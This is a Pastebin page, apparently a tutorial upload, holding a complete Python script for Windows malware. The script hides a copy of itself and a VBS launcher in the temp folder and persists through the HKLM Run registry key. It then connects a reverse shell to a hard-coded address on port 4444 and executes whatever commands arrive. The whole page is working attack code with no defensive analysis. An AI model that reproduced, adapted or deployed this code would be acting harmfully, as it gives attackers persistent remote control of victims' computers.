Advertisement
Guest User

Untitled

a guest
Mar 26th, 2019
144
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.75 KB | None | 0 0
  1.  
  2. import os
  3. import subprocess
  4. import socket
  5. import sys
  6. import tempfile
  7. from _winreg import *
  8.  
  9. MALWARE_NAME = "malware.exe"
  10. TRIGGER = MALWARE_NAME.replace('.exe','')+".vbs"
  11. KEY_PATH = "Software\Microsoft\Windows\CurrentVersion\Run"
  12. KEY_NAME = "anarc0der_key"
  13. REV_SHELL = "192.168.1.106"
  14. SHELL_PORT = 4444
  15. TRIGGER_PATH = tempfile.gettempdir()+"\\"+TRIGGER
  16. MALWARE_PATH = tempfile.gettempdir()+"\\"+MALWARE_NAME
  17.  
  18. class My_malware():
  19.  
  20. def infect_windows_register_keys(self):
  21. """ Method to register malware on windows keys.
  22. Returns False if didnt have key for malware.
  23. Returns True if already have key for malware. """
  24. key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH)
  25. keys = []
  26. try:
  27. i=0
  28. while True:
  29. cur_key = EnumValue(key, i)
  30. keys.append(cur_key[0])
  31. i+=1
  32. except:
  33. pass
  34. if KEY_NAME not in keys:
  35. mlwr_key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH, 0, KEY_ALL_ACCESS)
  36. SetValueEx(mlwr_key, KEY_NAME, 0, REG_SZ, TRIGGER_PATH)
  37. mlwr_key.Close()
  38. return False
  39. return True
  40.  
  41. def hide_malware_and_trigger(self):
  42. """ Method to generate & hide the trigger and malware.
  43. Return True if was alredy hided.
  44. Return False if wasnt hided """
  45. if os.path.exists(MALWARE_PATH) and os.path.exists(TRIGGER_PATH):
  46. return True
  47. else:
  48. payload = 'Set WshShell = WScript.CreateObject("WScript.Shell")\nWshShell.Run """{0}""", 0 , false'.format(MALWARE_PATH)
  49. with open(TRIGGER_PATH, 'w') as f:
  50. f.write(payload)
  51. os.system('copy %s %s'%(MALWARE_NAME, MALWARE_PATH))
  52. return False
  53.  
  54. def reverse_shell_function(self):
  55. """ Method of reverse shell in python """
  56. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  57. s.connect((REV_SHELL,SHELL_PORT))
  58. s.send('\n\!/ anarc0der mlwr tutorial\n\n[*] If you need to finish, just type: quit\n[*] PRESS ENTER TO PROMPT\n\n')
  59. while True:
  60. data = s.recv(1024)
  61. if "quit" in data:
  62. break
  63. cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
  64. saida_cmd = cmd.stdout.read() + cmd.stderr.read()
  65. s.send(saida_cmd)
  66. s.send("Comando: ")
  67. s.close()
  68.  
  69. def main():
  70. my_returns = []
  71. x = My_malware()
  72. my_returns.append(x.infect_windows_register_keys())
  73. my_returns.append(x.hide_malware_and_trigger())
  74. if all(res is True for res in my_returns):
  75. x.reverse_shell_function()
  76.  
  77. if __name__ == '__main__':
  78. main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement